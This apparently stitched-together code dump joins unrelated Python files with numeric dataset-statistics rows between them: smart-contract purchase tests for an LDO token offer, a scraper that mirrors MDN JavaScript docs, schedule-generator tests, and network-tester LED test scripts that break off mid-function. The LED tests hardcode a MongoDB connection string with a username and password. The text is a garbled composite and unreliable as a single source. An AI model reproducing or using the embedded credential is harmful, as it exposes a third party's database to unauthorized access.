executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost })
def test_double_purchase_not_allowed_via_transfer(accounts, executor, helpers, ldo_token, dao_token_manager, dao_agent):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
dao_eth_balance_before = dao_agent.balance()
tx = purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
with reverts("no allocation"):
purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
def test_double_purchase_not_allowed_via_execute_purchase(accounts, executor, dao_agent, helpers, ldo_token):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost })
with reverts("no allocation"):
executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost })
def test_overpay_is_returned_via_transfer(accounts, executor, dao_agent, helpers, ldo_token):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
overpay_amount = 1e18
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
initial_purchaser_balance = purchaser.balance()
helpers.fund_with_eth(purchaser, eth_cost + overpay_amount)
assert purchaser.balance() == initial_purchaser_balance + eth_cost + overpay_amount
dao_eth_balance_before = dao_agent.balance()
tx = purchaser.transfer(to=executor, amount=eth_cost + overpay_amount, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchaser.balance() == initial_purchaser_balance + overpay_amount
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
def test_overpay_is_returned_via_execute_purchase(accounts, executor, dao_agent, helpers, ldo_token):
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
overpay_amount = 1e18
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
initial_purchaser_balance = purchaser.balance()
helpers.fund_with_eth(purchaser, eth_cost + overpay_amount)
assert purchaser.balance() == initial_purchaser_balance + eth_cost + overpay_amount
dao_eth_balance_before = dao_agent.balance()
tx = executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost + overpay_amount })
purchase_evt = helpers.assert_single_event_named('PurchaseExecuted', tx)
assert purchaser.balance() == initial_purchaser_balance + overpay_amount
assert purchase_evt['ldo_receiver'] == purchaser
assert purchase_evt['ldo_allocation'] == purchase_ldo_amount
assert purchase_evt['eth_cost'] == eth_cost
dao_eth_balance_increase = dao_agent.balance() - dao_eth_balance_before
assert dao_eth_balance_increase == eth_cost
assert ldo_token.balanceOf(purchaser) == purchase_ldo_amount
def test_purchase_not_allowed_after_expiration_via_transfer(accounts, executor, helpers):
chain = Chain()
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
expiration_delay = executor.offer_expires_at() - chain.time()
chain.sleep(expiration_delay + 3600)
chain.mine()
with reverts("offer expired"):
purchaser.transfer(to=executor, amount=eth_cost, gas_limit=DIRECT_TRANSFER_GAS_LIMIT)
def test_purchase_not_allowed_after_expiration_via_execute_purchase(accounts, executor, helpers):
chain = Chain()
purchaser = accounts[0]
purchase_ldo_amount = LDO_ALLOCATIONS[0]
eth_cost = purchase_ldo_amount * ETH_TO_LDO_RATE_PRECISION // ETH_TO_LDO_RATE
allocation = executor.get_allocation(purchaser)
assert allocation[0] == purchase_ldo_amount
assert allocation[1] == eth_cost
helpers.fund_with_eth(purchaser, eth_cost)
expiration_delay = executor.offer_expires_at() - chain.time()
chain.sleep(expiration_delay + 3600)
chain.mine()
with reverts("offer expired"):
executor.execute_purchase(purchaser, { 'from': purchaser, 'value': eth_cost })
def test_recover_unsold_tokens_not_allowed_until_exparation(executor, dao_agent):
with reverts():
executor.recover_unsold_tokens()
def test_recover_unsold_tokens_returns_unsold_tokens_to_dao_vault_after_exparation(executor, dao_agent, ldo_token):
chain = Chain()
expiration_delay = executor.offer_expires_at() - chain.time()
chain.sleep(expiration_delay + 3600)
chain.mine()
executor_balance = ldo_token.balanceOf(executor)
dao_agent_balance = ldo_token.balanceOf(dao_agent)
executor.recover_unsold_tokens()
assert ldo_token.balanceOf(executor) == 0
assert ldo_token.balanceOf(dao_agent) == dao_agent_balance + executor_balance
| 38.103753 | 149 | 0.755286 | 2,252 | 17,261 | 5.349023 | 0.059947 | 0.044164 | 0.073385 | 0.040843 | 0.907853 | 0.887265 | 0.86701 | 0.85132 | 0.839532 | 0.831064 | 0 | 0.011654 | 0.15984 | 17,261 | 452 | 150 | 38.188053 | 0.81899 | 0.002723 | 0 | 0.786408 | 0 | 0 | 0.036783 | 0 | 0 | 0 | 0 | 0 | 0.291262 | 1 | 0.071197 | false | 0.038835 | 0.012945 | 0 | 0.087379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ca9c4899592f6d4da04cf64d33501520f938b37d | 9,403 | py | Python | mdn/scraper.py | nugycal/experiments | 089b9bb294afc3c5e6856aff15aaeeed21af71c4 | [
"MIT"
] | null | null | null | mdn/scraper.py | nugycal/experiments | 089b9bb294afc3c5e6856aff15aaeeed21af71c4 | [
"MIT"
] | null | null | null | mdn/scraper.py | nugycal/experiments | 089b9bb294afc3c5e6856aff15aaeeed21af71c4 | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
import requests
import json
import re
import os
API_URL = "https://developer.mozilla.org/en-US/docs/feeds/json/tag/Javascript"
REFERENCE_URL = "https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference"
BASE_URL = "https://developer.mozilla.org"
data = requests.get(REFERENCE_URL)
soup = BeautifulSoup(data.text, 'html.parser')
parent = soup.find("article", { "id": "wikiArticle" })
matches = []
links = []
for match in parent.find_all("a", href=True):
if re.sub('#[a-zA-Z0-9_=]*$', '', match['href']) not in matches:
links.append(re.sub(r'#.*', '', match["href"]))
matches.append(re.sub(r'#.*', '', match["href"]))
try:
os.mkdir("output")
except:
print("Couldn't create output directory")
exit(1)
try:
os.mkdir("output/res")
except:
print("Couldn't create resources directory")
exit(1)
linked_res = []
extra_links = []
for link in links:
data = requests.get(BASE_URL + link)
data = data.text
soup = BeautifulSoup(data, 'html.parser')
quick_links = soup.find("div", {'class':'quick-links'})
for a in quick_links.find_all("a", href=True):
if re.sub('#[a-zA-Z0-9_=]*$', '', a['href']) not in links:
extra_links.append(a['href'])
for a in soup.find_all("a", href=True):
if '/en-US/docs/' in a['href']:
a['href'] = a['href'].replace('/en-US/docs/', '/')
elif '/en-US/' == a['href']:
a['href'] = '/'
if not a['href'].endswith('.html') and not a['href'].endswith('/'):
a['href'] += ".html"
filename = re.sub('.*/', '', link)
if filename == '':
filename = "index.html"
if not filename.endswith(".html"):
filename += ".html"
dirent = re.sub('/[^/]*$', '', link.replace('/en-US/docs/', '/'))
for example in soup.find_all("pre", {'class':'brush:'}):
example.decompose()
for example in soup.find_all("iframe", {'class':'interactive'}):
example.decompose()
for stylesheet in soup.find_all("link", href=True):
if "http" in stylesheet['href'] and stylesheet['href'] not in linked_res and stylesheet['href'] not in links:
linked_res.append(stylesheet['href'])
sheet = requests.get(stylesheet['href'])
sheet = sheet.text
with open("output/res/" + re.sub(r'.*/', '', stylesheet['href']), "w") as f:
f.write(sheet)
elif stylesheet['href'] not in linked_res and stylesheet['href'] not in links and not stylesheet['href'].endswith('/'):
stylesheet['href'] = "https://developer.mozilla.org" + stylesheet['href']
linked_res.append(stylesheet['href'])
sheet = requests.get(stylesheet['href'])
sheet = sheet.text
with open("output/res/" + re.sub(r'.*/', '', stylesheet['href']), "w") as f:
f.write(sheet)
if "http" in stylesheet['href']:
stylesheet['href'] = "/res/" + re.sub(r'.*/', '', stylesheet['href'])
for script in soup.find_all("script", src=True):
if "http" in script['src'] and script['src'] not in linked_res:
linked_res.append(script['src'])
sheet = requests.get(script['src'])
sheet = sheet.text
with open("output/res/" + re.sub(r'.*/', '', script['src']), "w") as f:
f.write(sheet)
elif script['src'] not in linked_res and not stylesheet['href'].endswith('/'):
script['src'] = "https://developer.mozilla.org" + script['src']
linked_res.append(script['src'])
sheet = requests.get(script['src'])
sheet = sheet.text
with open("output/res/" + re.sub(r'.*/', '', script['src']), "w") as f:
f.write(sheet)
if "http" in script['src']:
script['src'] = "/res/" + re.sub(r'.*/', '', script['src'])
for image in soup.find_all("img", src=True):
if "http" in image['src'] and image['src'] not in linked_res:
linked_res.append(image['src'])
sheet = requests.get(image['src'])
with open("output/res/" + re.sub(r'.*/', '', image['src']), "wb") as f:
f.write(sheet.content)
elif image['src'] not in linked_res and not stylesheet['href'].endswith('/'):
image['src'] = "https://developer.mozilla.org" + image['src']
linked_res.append(image['src'])
sheet = requests.get(image['src'])
with open("output/res/" + re.sub(r'.*/', '', image['src']), "wb") as f:
f.write(sheet.content)
if "http" in stylesheet['href']:
image['src'] = "/res/" + re.sub(r'.*/', '', image['src'])
try:
os.makedirs("output/" + dirent)
except:
print("Failed to construct directory tree: " + "output/" + re.sub(r'/[A-Za-z\._]+$', '', link).replace('/en-US/docs/', ''))
with open("output/" + dirent + "/" + filename, "w") as f:
f.write(str(soup))
with open("output/index.html", "a") as f:
f.write('<a href="' + dirent + "/" + filename + '">' + re.sub(r'.*/', '', link) + "</a><br>")
for link in extra_links:
data = requests.get(BASE_URL + link)
data = data.text
soup = BeautifulSoup(data, 'html.parser')
for a in soup.find_all("a", href=True):
if '/en-US/docs/' in a['href']:
a['href'] = a['href'].replace('/en-US/docs/', '/') + ".html"
elif '/en-US/' == a['href']:
a['href'] = '/'
if not a['href'].endswith('.html') and not a['href'].endswith('/'):
a['href'] += ".html"
filename = re.sub('.*/', '', link)
if filename == '':
filename = "index.html"
if not filename.endswith(".html"):
filename += ".html"
dirent = re.sub('/[^/]*$', '', link.replace('/en-US/docs/', '/'))
for example in soup.find_all("pre", {'class':'brush:'}):
example.decompose()
for example in soup.find_all("iframe", {'class':'interactive'}):
example.decompose()
for stylesheet in soup.find_all("link", href=True):
if "http" in stylesheet['href'] and stylesheet['href'] not in linked_res and stylesheet['href'] not in links:
linked_res.append(stylesheet['href'])
sheet = requests.get(stylesheet['href'])
sheet = sheet.text
with open("output/res/" + re.sub(r'.*/', '', stylesheet['href']), "w") as f:
f.write(sheet)
elif stylesheet['href'] not in linked_res and stylesheet['href'] not in links and not stylesheet['href'].endswith('/'):
stylesheet['href'] = "https://developer.mozilla.org" + stylesheet['href']
linked_res.append(stylesheet['href'])
sheet = requests.get(stylesheet['href'])
sheet = sheet.text
with open("output/res/" + re.sub(r'.*/', '', stylesheet['href']), "w") as f:
f.write(sheet)
if "http" in stylesheet['href']:
stylesheet['href'] = "/res/" + re.sub(r'.*/', '', stylesheet['href'])
for script in soup.find_all("script", src=True):
if "http" in script['src'] and script['src'] not in linked_res:
linked_res.append(script['src'])
sheet = requests.get(script['src'])
sheet = sheet.text
with open("output/res/" + re.sub(r'.*/', '', script['src']), "w") as f:
f.write(sheet)
elif script['src'] not in linked_res and not stylesheet['href'].endswith('/'):
script['src'] = "https://developer.mozilla.org" + script['src']
linked_res.append(script['src'])
sheet = requests.get(script['src'])
sheet = sheet.text
with open("output/res/" + re.sub(r'.*/', '', script['src']), "w") as f:
f.write(sheet)
if "http" in script['src']:
script['src'] = "/res/" + re.sub(r'.*/', '', script['src'])
for image in soup.find_all("img", src=True):
if "http" in image['src'] and image['src'] not in linked_res:
linked_res.append(image['src'])
sheet = requests.get(image['src'])
with open("output/res/" + re.sub(r'.*/', '', image['src']), "wb") as f:
f.write(sheet.content)
elif image['src'] not in linked_res and not stylesheet['href'].endswith('/'):
image['src'] = "https://developer.mozilla.org" + image['src']
linked_res.append(image['src'])
sheet = requests.get(image['src'])
with open("output/res/" + re.sub(r'.*/', '', image['src']), "wb") as f:
f.write(sheet.content)
if "http" in stylesheet['href']:
image['src'] = "/res/" + re.sub(r'.*/', '', image['src'])
try:
os.makedirs("output/" + re.sub(r'/[A-Za-z\._]+$', '', link).replace('/en-US/docs/', ''))
except:
print("Failed to construct directory tree: " + "output/" + re.sub(r'/[A-Za-z\._]+$', '', link).replace('/en-US/docs/', ''))
with open("output/" + re.sub(r'/[A-Za-z\._]+$', '', link).replace('/en-US/docs/', '') + "/" + re.sub(r'.*/', '', link) + ".html", "w") as f:
f.write(str(soup))
with open("output/index.html", "a") as f:
f.write('<a href="' + re.sub(r'/[A-Za-z\._]+$', '', link).replace('/en-US/docs/', '') + "/" + re.sub(r'.*/', '', link) + ".html" + '">' + re.sub(r'.*/', '', link) + "</a><br>")
| 43.939252 | 184 | 0.532596 | 1,209 | 9,403 | 4.09512 | 0.087676 | 0.113108 | 0.035144 | 0.032721 | 0.893153 | 0.878004 | 0.86427 | 0.86427 | 0.850131 | 0.850131 | 0 | 0.000988 | 0.246198 | 9,403 | 213 | 185 | 44.14554 | 0.697517 | 0 | 0 | 0.797814 | 0 | 0.005464 | 0.19632 | 0 | 0.005464 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027322 | 0 | 0.027322 | 0.021858 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
04b0b380424bea9b6a4f709cde307959439c5655 | 2,495 | py | Python | tests/test_lhs_schedule_generator.py | stbalduin/memobuilder | c99eb8e711d5109c1322f443441b5a07c079e2f0 | [
"MIT"
] | null | null | null | tests/test_lhs_schedule_generator.py | stbalduin/memobuilder | c99eb8e711d5109c1322f443441b5a07c079e2f0 | [
"MIT"
] | null | null | null | tests/test_lhs_schedule_generator.py | stbalduin/memobuilder | c99eb8e711d5109c1322f443441b5a07c079e2f0 | [
"MIT"
] | null | null | null | from memoutil.schedules import LHSScheduleGenerator
def test_lhs_schedule_generator_with_maximum_slot_number():
num_schedules = 10 # total number of schedules to generate
resolution = 900 # simulation step size. time difference of two schedule items in seconds
duration = 86400 # total duration of each target schedule: One day
num_slots = 96 # number of slots for the target schedule: 96 slots for one day means: slots of 900s duration
min = -1000.
max = 1000.
schedules = LHSScheduleGenerator.generate_schedules(num_schedules, resolution, duration, num_slots, min, max)
assert len(schedules) == 10
for schedule in schedules:
#print(schedule)
assert len(schedule) == 96
assert all([v > min for v in schedule])
assert all([v < max for v in schedule])
def test_lhs_schedule_generator_with_slots_of_1Hour():
num_schedules = 10 # total number of schedules to generate
resolution = 900 # simulation step size. time difference of two schedule items in seconds
duration = 86400 # total duration of each target schedule: One day
num_slots = 24 # number of slots for the target schedule: 24 slots for one day means: slots of one hour duration
min = -1000.
max = 1000.
schedules = LHSScheduleGenerator.generate_schedules(num_schedules, resolution, duration, num_slots, min, max)
assert len(schedules) == 10
for schedule in schedules:
#print(schedule)
assert len(schedule) == 96
assert all([v > min for v in schedule])
assert all([v < max for v in schedule])
def test_lhs_schedule_generator_with_slots_of_4Hour():
num_schedules = 10 # total number of schedules to generate
resolution = 900 # simulation step size. time difference of two schedule items in seconds
duration = 86400 # total duration of each target schedule: One day
num_slots = 6 # number of slots for the target schedule: 6 slots for one day means: slots of 4 hour duration
min = -1000.
max = 1000.
schedules = LHSScheduleGenerator.generate_schedules(num_schedules, resolution, duration, num_slots, min, max)
assert len(schedules) == 10
for schedule in schedules:
# print(schedule)
assert len(schedule) == 96
assert all([v > min for v in schedule])
assert all([v < max for v in schedule])
if __name__ == '__main__':
#test_lhs_schedule_generator_with_slots_of_1Hour()
test_lhs_schedule_generator_with_slots_of_4Hour() | 43.017241 | 116 | 0.715832 | 347 | 2,495 | 4.979827 | 0.172911 | 0.028356 | 0.034722 | 0.048611 | 0.946759 | 0.946759 | 0.928819 | 0.826389 | 0.774306 | 0.774306 | 0 | 0.043077 | 0.218437 | 2,495 | 58 | 117 | 43.017241 | 0.843077 | 0.339078 | 0 | 0.785714 | 1 | 0 | 0.004899 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 1 | 0.071429 | false | 0 | 0.02381 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
04d35da1e0d1f0eafc3cbd5c3894e4951704f810 | 33,508 | py | Python | fnat_testset/testcase/testcategory_1/testgroup_4.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | fnat_testset/testcase/testcategory_1/testgroup_4.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | fnat_testset/testcase/testcategory_1/testgroup_4.py | lizhouw-netscout/fnat | 684958773379a9205857f1932de443ed0c4334a0 | [
"Apache-2.0"
] | null | null | null | from fnat_dev import FnatDevice
from switch import Switch
import time
import sys
import os
from gateway import Gateway
from dhcp import DHCP
from dns import DNS
from nistnet import Nistnet
from demo import UITest
import serial
import pymongo
from pymongo import MongoClient
from selenium import webdriver
from wifi import Cell,Scheme
from hp2910 import HP2910
def setUp():
print "Method setUp in class testclass_4"
print('These are led events testset')
def tearDown():
print "Method tearDown in class testclass_4"
print('These are led events testset')
def testmethod_1():
print "Method testmethod_1 in class testclass_4"
print "Method GW empty, DNS empty, WWW hostname in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.ping_config('www.baidu.com')
time.sleep(3)
ui_operation.proxy_off_config()
time.sleep(5)
ui_operation.static_config_retest('192.168.2.33','255.255.255.0','0.0.0.0','0.0.0.0')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_2():
print "Method testmethod_2 in class testclass_4"
print "Method GW empty, DNS empty, WWW IP, same subnet, reachable in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','0.0.0.0')
time.sleep(5)
ui_operation.ping_config_retest('192.168.2.200')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudgreen.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'green'
def testmethod_3():
print "Method testmethod_3 in class testclass_4"
print "GW empty, DNS empty, WWW IP, same subnet, fw enable in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
firewall = Gateway()
firewall.set_firewall_enable()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','0.0.0.0')
time.sleep(5)
ui_operation.ping_config_retest('192.168.2.200')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
firewall1 = Gateway()
firewall1.set_firewall_disable()
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_4():
print "Method testmethod_4 in class testclass_4"
print "Method GW emtpy, DNS empty, WWW IP, same subnet, arp failed in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','0.0.0.0')
time.sleep(5)
ui_operation.ping_config_retest('192.168.2.2')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
ser.port = '/dev/ttyUSB0'
ser.open()
assert ser.isOpen()
ser.write('leds\n')
ser.inWaiting()
b = ser.read(110)
str1 = bytes.decode(b)
print(str1)
dhcp_led = 'DHCP:\tGREEN'
GW_led = 'GW:\tNONE'
#www_led = 'WWW:\tRED'
assert str1.find(dhcp_led) != -1
assert str1.find(GW_led) != -1
dhcp_test = UITest()
dhcp_test.dhcp_config_retest()
time.sleep(5)
cloudHeadIcon_value = browser.find_element_by_id('cloudHeadIcon').is_displayed()
print(cloudHeadIcon_value)
browser.quit()
if cloudHeadIcon_value == False:
assert True
else:
assert False
MONGOHQ_URL='mongodb://linksprinterzbc:1qaz2WSX12@c494.candidate.42.mongolayer.com:10494/linksprinter-new-test'
DATABASE = 'linksprinter-new-test'
mongoClient = MongoClient(MONGOHQ_URL)
linksprinter = mongoClient[DATABASE]
collection=linksprinter.results
print(collection)
a = collection.find({"unit_mac": "00C017-090909","cached": True}).sort([("created_at",pymongo.DESCENDING)]).limit(1)
aa = dict(a[0])
dhcp_color = aa['ipConfigColor']
www_color = aa['wwwColor']
print('The ipConfigColor is %s' % dhcp_color)
print('The wwwColor is %s' % www_color)
assert dhcp_color == u'green'
assert www_color == u'red'
def testmethod_5():
print "Method testmethod_5 in class testclass_4"
print "Method GW empty, DNS empty, WWW IP, diffirent subent in class testclass_4"
__author__ = 'bzhang4'
scheme = Scheme.find('wlan0','1234')
time.sleep(5)
scheme.activate()
ui_operation = UITest()
ui_operation.static_config('192.168.2.33','255.255.255.0','0.0.0.0','0.0.0.0')
time.sleep(5)
ui_operation.ping_config_retest('192.168.1.200')
browser = webdriver.Firefox()
browser.get('http://172.16.9.9')
time.sleep(3)
ipConfig_value = browser.find_element_by_id("ipConfigHeadIcon").get_attribute('src')
GW_value = browser.find_element_by_id("gateHeadIcon").get_attribute('src')
cloud_value = browser.find_element_by_id("wwwHeadIcon").get_attribute('src')
print(cloud_value)
known_ipConfig_value = 'http://172.16.9.9/images/dhcpgreen.png'
known_GW_value = 'http://172.16.9.9/images/gatewayblack.png'
known_cloud_value = 'http://172.16.9.9/images/cloudred.png'
assert ipConfig_value == known_ipConfig_value
assert GW_value == known_GW_value
assert cloud_value == known_cloud_value
ser = serial.Serial()
ser.baudrate = 115200
